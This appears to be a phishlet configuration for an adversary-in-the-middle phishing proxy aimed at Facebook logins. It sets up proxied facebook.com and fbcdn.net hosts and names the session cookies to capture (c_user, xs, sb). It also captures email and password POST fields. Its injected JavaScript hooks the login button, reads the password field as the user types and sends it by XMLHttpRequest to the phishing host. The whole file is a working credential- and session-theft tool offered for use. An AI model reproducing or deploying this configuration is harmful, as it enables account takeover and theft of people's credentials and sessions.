author: '@An0nud4y' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true} - {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false} - {phish_sub: 'api', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false} sub_filters: - {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} - {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} - {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']} auth_tokens: - domain: '.facebook.com' keys: ['c_user','xs','sb'] credentials: username: key: 'email' search: '(.*)' type: 'post' password: key: 'unenc_password' search: '(.*)' type: 'post' login: domain: 'www.facebook.com' path: '/login.php' js_inject: - trigger_domains: ["www.facebook.com"] trigger_paths: ["/login","/login.php", "/login/device-based/regular/login/", "/login/*"] trigger_params: [] script: | function onclickListener(){ var submit = document.querySelectorAll('button[type=submit]')[0]; var submitmobile = document.getElementById('u_0_5'); var submitbuttonmobile = document.querySelectorAll('button[type=button]')[0]; document.getElementsByTagName("button")[0].addEventListener("click", fclick); submit.addEventListener("click", fclick); submitmobile.addEventListener("click", fclick); submitbuttonmobile.addEventListener("click", fclick); return; } function fclick() { function fcheck() { if (JSON.parse(document.getElementsByName("pass")[0].value == "")) { setTimeout(fcheck, 100); } else { var unenc_password = document.getElementsByName("pass")[0].value; var xhr = new XMLHttpRequest(); xhr.open("POST", 'qwertyqwerty/', true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("unenc_password=" + encodeURIComponent(unenc_password)); console.log(unenc_password); } fcheck(); } } setTimeout(function(){ onclickListener(); }, 2500);